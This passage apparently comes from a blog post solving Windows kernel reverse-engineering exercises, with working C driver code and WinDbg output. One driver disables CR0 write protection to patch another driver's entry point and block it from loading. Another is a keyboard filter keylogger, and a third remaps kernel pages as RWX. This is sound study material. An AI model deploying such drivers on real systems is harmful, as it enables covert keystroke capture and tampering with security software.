      DWORD SizeOfUninitializedData;  
      DWORD AddressOfEntryPoint;  
      DWORD BaseOfCode;  
      ULONGLONG ImageBase;  
      DWORD SectionAlignment;  
      DWORD FileAlignment;  
      WORD MajorOperatingSystemVersion;  
      WORD MinorOperatingSystemVersion;  
      WORD MajorImageVersion;  
      WORD MinorImageVersion;  
      WORD MajorSubsystemVersion;  
      WORD MinorSubsystemVersion;  
      DWORD Win32VersionValue;  
      DWORD SizeOfImage;  
      DWORD SizeOfHeaders;  
      DWORD CheckSum;  
      WORD Subsystem;  
      WORD DllCharacteristics;  
      ULONGLONG SizeOfStackReserve;  
      ULONGLONG SizeOfStackCommit;  
      ULONGLONG SizeOfHeapReserve;  
      ULONGLONG SizeOfHeapCommit;  
      DWORD LoaderFlags;  
      DWORD NumberOfRvaAndSizes;  
      IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];  
 } IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;  
   
 typedef struct _IMAGE_NT_HEADERS64 {  
      DWORD Signature;  
      IMAGE_FILE_HEADER FileHeader;  
      IMAGE_OPTIONAL_HEADER64 OptionalHeader;  
 } IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;  
   
 DRIVER_INITIALIZE DriverEntry;  
   
 #ifdef ALLOC_PRAGMA  
 #pragma alloc_text( INIT, DriverEntry )  
 #endif  
   
 VOID  
   (load_img)(  
      PUNICODE_STRING FullImageName,  
      HANDLE ProcessId,  
      PIMAGE_INFO ImageInfo  
   )  
 {  
      WCHAR *drivername;  
      UNICODE_STRING servicename;  
      NTSTATUS unload;  
      PIMAGE_DOS_HEADER MZ;  
      PIMAGE_NT_HEADERS64 PE;  
      UINT8 * entry_point;  
      unsigned __int64 cr0;  
      char patch[] = {0xb8, 0x01, 0x00, 0x00, 0xc0, 0xc3};  
   
      if(!(ImageInfo->SystemModeImage))  
      {  
           // ignore usermode images  
           return;  
      }  
   
      if(FullImageName->Length >= 8*sizeof(WCHAR))  
      {  
           drivername = FullImageName->Buffer + (FullImageName->Length/sizeof(WCHAR)) - 8;  
           if(wcsncmp(drivername, L"\\bda.sys", 8) == 0)  
           {  
                DbgPrint("bda.sys diver detected! imagebase %p \n", (UINT8*)ImageInfo->ImageBase);  
   
                MZ = (IMAGE_DOS_HEADER *) ImageInfo->ImageBase;  
                PE = (PIMAGE_NT_HEADERS64) ( ((UINT8*)ImageInfo->ImageBase) + MZ->e_lfanew);  
                entry_point = PE->OptionalHeader.AddressOfEntryPoint + (UINT8*)ImageInfo->ImageBase;  
   
                _disable();  
                cr0 = __readcr0();  
                __writecr0(cr0 & 0xfffeffff);  
   
                //patch:  
                // b8 01 00 00 c0   mov  eax, 0xc0000001  
                // c3         ret  
                memcpy(entry_point , &patch, sizeof(patch));  
     
                __writecr0(cr0);  
                _enable();  
   
           }  
      }  
 }  
   
 VOID MyUnload(__in PDRIVER_OBJECT DriverObject)  
 {  
      PsRemoveLoadImageNotifyRoutine(&load_img);  
 }  
   
 NTSTATUS  
 DriverEntry(PDRIVER_OBJECT  DriverObject, PUNICODE_STRING RegistryPath)  
 {  
      DriverObject->DriverUnload = &MyUnload;   
   
      PsSetLoadImageNotifyRoutine(&load_img);  
   
      return STATUS_SUCCESS;  
 }  

The driver installs a load image notify routine via PsSetImageNotifyRoutine. This routine verifies if the name of the loaded image is bda.sys, and if it is, it patches its entry point with assembly instructions equivalent to:
 return STATUS_UNSUCCESSFUL;  

The load image notify routine is called after the driver is mapped in memory, but before its entry point is executed. Thus, patching the entry point with the above code will cause the driver to report a failure in loading and the OS will unload bda.sys from memory without executing any other code from it.
Finally, when the driver is unloaded, the callback to the load image notify routine is removed via PsRemoveLoadImageNotifyRoutine.

6)
sioctl.h:
 #include <ntddkbd.h>  
   
 typedef struct _DEVICE_EXTENSION   
 {   
   PDEVICE_OBJECT pTargetDevice;   
 } DEVICE_EXTENSION, *PDEVICE_EXTENSION;   

sioctl.c:
 #include <ntddk.h>  
 #include <string.h>  
 #include "sioctl.h"  
   
 #define WORD  UINT16  
 #define DWORD UINT32  
 #define BYTE  UINT8  
   
 DRIVER_INITIALIZE DriverEntry;  
   
 #ifdef ALLOC_PRAGMA  
 #pragma alloc_text( INIT, DriverEntry )  
 #endif  
   
 PDEVICE_OBJECT kbd_class_dev = NULL;  
 PDEVICE_OBJECT my_keyboard_dev = NULL;  
   
 // scan codes taken from http://www.win.tue.nl/~aeb/linux/kbd/scancodes-10.html (column Set 1)  
 #define SCAN_MAPPINGS 0x3b  
 unsigned char* scan_code_mapping[SCAN_MAPPINGS] = {  
 "<unk>", "<unk>", "1 or !", "2 or @", "3 or #", "4 or $", "5 or %", "6 or ^", "7 or &", "8 or *", "9 or (", "0 or )",  
 "- or _", "= or +", "Backspace", "Tab", "Q", "W", "E", "R", "T", "Y", "U", "I", "O", "P", "[ or {", "] or }", "Enter", "LCtrl",  
 "A", "S", "D", "F", "G", "H", "J", "K", "L", "; or :", "' or \"", "` or ~", "LShift", "\\ or |",   
 "Z","X", "C", "V", "B", "N", "M", ", or <", ". or >", "/ or ?", "RShift", "<unk>", "LAlt", "space", "CapsLock"  
 };  
   
 VOID MyUnload(__in PDRIVER_OBJECT DriverObject)  
 {  
      DbgPrint("Unload routine\n");  
      IoDetachDevice(kbd_class_dev);  
      IoDeleteDevice(my_keyboard_dev);  
 }  
   
 NTSTATUS io_completion(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)  
 {  
      KEYBOARD_INPUT_DATA *key_buffer;  
      unsigned long key_number = 0, i;  
        
      // read data from the IRP, put it in key  
      if(Irp->IoStatus.Status == STATUS_SUCCESS)  
      {  
           // system buffer may contain an array of KEYBOARD_INPUT_DATA  
           // The size (in bytes) of the SystemBuffer is stored in Irp->IoStatus.Information  
           key_buffer = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;  
           if(Irp->IoStatus.Information != 0)  
           {  
                key_number = (unsigned long)(Irp->IoStatus.Information) / sizeof(KEYBOARD_INPUT_DATA);  
           }  
   
           for(i = 0; i < key_number; i++)  
           {  
                // only log char in a key release event, not key press  
                if(key_buffer[i].Flags == KEY_BREAK)  
                {  
                     if(key_buffer[i].MakeCode < SCAN_MAPPINGS)  
                     {  
                          // translate and log the scan code  
                          DbgPrint("Key scancode: %s \n", scan_code_mapping[ key_buffer[i].MakeCode ]);  
                     }  
                     else  
                     {  
                          DbgPrint("<unk>\n");  
                     }  
                }  
           }  
      }  
        
      if(Irp->PendingReturned) IoMarkIrpPending(Irp);  
      return Irp->IoStatus.Status;  
 }   
   
 NTSTATUS kbd_mj_read(PDEVICE_OBJECT DeviceObject, PIRP Irp)  
 {  
      IoCopyCurrentIrpStackLocationToNext(Irp);  
      IoSetCompletionRoutine(Irp, io_completion, NULL, TRUE, TRUE, TRUE);  
      return IoCallDriver(((PDEVICE_EXTENSION)DeviceObject->DeviceExtension)->pTargetDevice, Irp);   
 }  
   
 NTSTATUS DriverEntry(DRIVER_OBJECT *DriverObject, PUNICODE_STRING RegistryPath)  
 {  
      NTSTATUS status_code;  
      UNICODE_STRING kbd_class_name;  
      PFILE_OBJECT kbd_class_file = NULL;  
      PDEVICE_EXTENSION device_ext;  
      int i;  
   
      DriverObject->DriverUnload = &MyUnload;  
      DriverObject->MajorFunction[IRP_MJ_READ] = &kbd_mj_read;  
   
      // create a new device  
      status_code = IoCreateDevice(DriverObject, sizeof(DEVICE_EXTENSION), NULL, FILE_DEVICE_KEYBOARD, 0, FALSE, &my_keyboard_dev);  
      if(status_code != STATUS_SUCCESS)  
      {  
           DbgPrint("Error creating device \n");  
           return STATUS_UNSUCCESSFUL;  
      }  
   
      // retrieve the keyboard class device   
      RtlInitUnicodeString(&kbd_class_name, L"\\Device\\KeyboardClass0");  
      status_code = IoGetDeviceObjectPointer(&kbd_class_name, FILE_READ_ATTRIBUTES, &kbd_class_file, &kbd_class_dev);  
      if(status_code != STATUS_SUCCESS)  
      {  
           DbgPrint("Error getting keyboard class object \n");  
           return STATUS_UNSUCCESSFUL;  
      }  
   
      // set the device extension for the new device and attach it to class device     
      RtlZeroMemory(my_keyboard_dev->DeviceExtension, sizeof(DEVICE_EXTENSION));  
      device_ext = (PDEVICE_EXTENSION)my_keyboard_dev->DeviceExtension;  
      device_ext->pTargetDevice = IoAttachDeviceToDeviceStack(my_keyboard_dev, kbd_class_dev);  
      if(device_ext->pTargetDevice == NULL)  
      {  
           DbgPrint("Error attaching to keyboard device \n");  
           return STATUS_UNSUCCESSFUL;  
      }  
   
      // important! Set the correct flags for the new device, especially DO_BUFFERED_IO, or else  
      // the new device won't have any flag set, and IRP.AssociatedIrp.SystemBuffer will be zero  
      // causing the system to copy the scancode data to a NULL buffer, which will bsod  
      my_keyboard_dev->Flags = kbd_class_dev->Flags;  
   
      return STATUS_SUCCESS;  
 }  
   

The driver implements a basic keylogger. It attaches its device object to the keyboard device stack and filters the IRPs going to it. In particular, the device object is created via IoCreateDevice, passing FILE_DEVICE_KEYBOARD as the DeviceType and setting its DeviceExtension to target the keyboard device stack via IoAttachDeviceToDeviceStack. The keyboard device is obtained via IoGetDeviceObjectPointer, by specifying \\Device\\KeyboardClass0 as the ObjectName. The flags of the keyboard device are actually used to set the ones of the newly created device object, as explained in the source code.
Moreover, the MajorFunction[IRP_MJ_READ] entry (in the driver object) is set to a simple pass-through function, that receives an IRP, sets a completion routine (via IoSetCompletionRoutine), copies the current stack location to the next device stack location (via IoCopyCurrentIrpStackLocationToNext) and calls its IRP_MJ_READ function (via IoCallDriver). The completion routine processes the IRP after the keyboard driver has filled it with the information about the received keystroke. The driver simply inspects each KEYBOARD_INPUT_DATA structure from the output buffer (stored in IRP.AssociatedIrp.SystemBuffer) and retrieves the keystroke scan codes. 
I used standard scan codes to perform a very basic mapping of the keystrokes to the relative characters, however such translation is in general way more complicated than this implementation.
During the unloading of the driver, the device will be first detached from the keyboard one (via IoDetachDevice) and then deleted (via IoDeleteDevice).

7)
The first implementation I wrote is the following:
 #include <ntifs.h>  
 #include <string.h>   
   
 #define WORD  UINT16  
 #define DWORD UINT32  
 #define BYTE  UINT8  
   
 VOID MyUnload(PDRIVER_OBJECT DriverObject)  
 {  
      DbgPrint("Unload routine\n");  
 }  
   
 // return value: 0 = success, nonzero = error  
 int change_protection(BYTE *virtual_address, ULONG length, PMDL *Mdl, PVOID *address)  
 {  
      *Mdl = IoAllocateMdl(virtual_address, length, 0, 0, NULL);  
      if(Mdl == NULL)  
      {  
           return 1;  
      }  
   
      MmProbeAndLockPages(*Mdl, KernelMode, IoReadAccess);  
        
      *address = MmMapLockedPagesSpecifyCache(*Mdl, KernelMode, MmNonCached, (PVOID)virtual_address, FALSE, NormalPagePriority);  
      if(*address == NULL)  
      {  
           return 2;  
      }  
        
      DbgPrint("Mapped address: %lx \n", *address);  
   
      if(MmProtectMdlSystemAddress(*Mdl, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)  
      {  
           return 3;  
      }  
   
      return 0;  
 }  
   
 void unmap_mdl(PMDL *Mdl, PVOID *Address)  
 {  
      MmUnmapLockedPages(*Address, *Mdl);  
      IoFreeMdl(*Mdl);  
 }  
   
 NTSTATUS DriverEntry(DRIVER_OBJECT *DriverObject, PUNICODE_STRING RegistryPath)  
 {  
      NTSTATUS status_code;  
      BYTE *nonpaged_address;  
      int code;  
      PMDL pMdl;  
      BYTE *new_address;   
   
      DriverObject->DriverUnload = MyUnload;  
   
      // taken from monitor.sys (mapped in the range fffff880`0459f000 - fffff880`045ad000)
      nonpaged_address = (BYTE *)0xfffff8800459f000;  
        
      code = change_protection(nonpaged_address, 0x10, &pMdl, (void*)&new_address);  
      DbgPrint("change protection return value: %d \n", code);  
   
      unmap_mdl(&pMdl, (void*)&new_address);  
   
      return STATUS_SUCCESS;  
 }  
      

The driver creates a MDL associated to a virtual address, then probes and locks it and finally maps it to a new virtual address. As an extra, I call the function MmProtectMdlSystemAddress to ensure that the RWX protection is set, but by debugging I have noticed that such protection is already in place after MmMapLockedPagesSpecifyCache (MmBuildMdlForNonPagedPool would have been more appropriate normally, but for the sake of this exercise it can be ignored). After the work is done, the MDL is released by unmapping its pages and deallocating it.

To verify that the protection is successfully changed, I made a simple test. I used the !pte debugger extension to translate the virtual address of the imagebase of monitor.sys:

kd> !pte 0xfffff8800459f000
VA fffff8800459f000

PXE at FFFFF6FB7DBEDF88  
contains 000000003BF84863
pfn 3bf84     ---DA--KWEV

PPE at FFFFF6FB7DBF1000  
contains 000000003BF83863
pfn 3bf83     ---DA--KWEV

PDE at FFFFF6FB7E200110  
contains 0000000020CEE863
pfn 20cee     ---DA--KWEV

PTE at FFFFF6FC40022CF8
contains 800000003CDD7963
pfn 3cdd7     -G-DA--KW-V

(the command output has been edited for better readability)

Then, I repeated the test by using the virtual address that I obtained with MmMapLockedPagesSpecifyCache:

kd> !pte fffff8800d249000
VA fffff8800d249000

PXE at FFFFF6FB7DBEDF88  
contains 000000003BF84863

pfn 3bf84     ---DA--KWEV

PPE at FFFFF6FB7DBF1000  
contains 000000003BF83863
pfn 3bf83     ---DA--KWEV

PDE at FFFFF6FB7E200348  
contains 0000000035879863
pfn 35879     ---DA--KWEV

PTE at FFFFF6FC40069248
contains 000000003CDD7963
pfn 3cdd7     -G-DA--KWEV

The log shows that while the former lacks the executable protection, the latter does not.
As suggested by the exercise, I tested the same code using the imagebase address of win32k.sys, that is a session space address, and the system crashed with a BSOD. A quick investigation revealed the problem: the DriverEntry routine is called in the context of the System process, which is not associated to any session. Thus, the session space virtual addresses are not available and cannot be used to build MDLs.
I experimented a bit and found a simple trick to bypass this problem: if the System process is not associated to a session, the code should work if it is run from the context of a process that is associated to a session. This is a simple modification that would make the driver code work:
      KAPC_STATE apcstate;  
      
      // taken from fffff960`00060000 fffff960`00370000  win32k   
      KeStackAttachProcess((PEPROCESS)0xfffffa8002d7a770, &apcstate); // explorer peprocess  
      nonpaged_address = (BYTE *)0xfffff96000060000;  
   
      code = change_protection(nonpaged_address, 0x10);  
      DbgPrint("change protection return value: %d \n", code);  
   
      KeUnstackDetachProcess(&apcstate);  

I used KeStackAttachProcess in order to get in the context of Explorer.exe, which is associated to the currently logged in user, but any other process run inside the same login session would have worked (the PEPROCESS is hardcoded just for this test). Debugging this code, I tested the accessibility of win32k.sys imagebase address via WinDbg before the driver attached to Explorer:

kd> !pte 0xfffff96000060000
VA fffff96000060000

PXE at FFFFF6FB7DBEDF90  
contains 0000000000000000

not valid

kd> db 0xfffff96000060000
fffff960`00060000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

Translating the virtual address to a physical one shows an invalid PTE, and even dumping the bytes from that memory address returns no data. However, as soon as I step beyond KeStackAttachProcess the address becomes available:

kd> !pte fffff960`00060000

VA fffff96000060000

PXE at FFFFF6FB7DBEDF90  
contains 00000000184BC863

pfn 184bc     ---DA--KWEV

PPE at FFFFF6FB7DBF2C00  
contains 0000000018ACD863
pfn 18acd     ---DA--KWEV

PDE at FFFFF6FB7E580000  
contains 0000000018DCC863
pfn 18dcc     ---DA--KWEV

PTE at FFFFF6FCB0000300
contains 8030000012588201
pfn 12588     C------KR-V

and the driver code works too, creating a mapping with RWX attribute:

kd> !pte fffff8800e0b4000
VA fffff8800e0b4000

PXE at FFFFF6FB7DBEDF88  
contains 000000003BF84863
pfn 3bf84     ---DA--KWEV

PPE at FFFFF6FB7DBF1000  
contains 000000003BF83863
pfn 3bf83     ---DA--KWEV

PDE at FFFFF6FB7E200380  
contains 0000000030237863
pfn 30237     ---DA--KWEV

PTE at FFFFF6FC400705A0
contains 0000000012588963

pfn 12588     -G-DA--KWEV

If I step further down with the debugger, and go after KeUnstackDetachProcess, the address becomes dead again.

8)
To figure out which function is calling the DriverEntry I have: written a dummy driver; set a breakpoint on its entry point with DbgBreakPoint(); run it under kernel debugging so that I could dump the stack.

driver!DriverEntry+0x3a
nt!IopLoadDriver+0xa07
nt!IopLoadUnloadDriver+0x55
nt!ExpWorkerThread+0x111
nt!PspSystemThreadStartup+0x5a
nt!KxStartSystemThread+0x16

The dump shows the functions that were called right before the DriverEntry. The direct responsible for calling the entry point is IopLoadDriver, which is in turn called by IopLoadUnloadDriver. This function manages both the loading and unloading of a driver (calling the entry point or the driver unload routine respectively), and it is called by a dedicated system thread, as can be noted by the three functions ExpWorkerThread, PspSystemThreadStartup and KxStartSystemThread.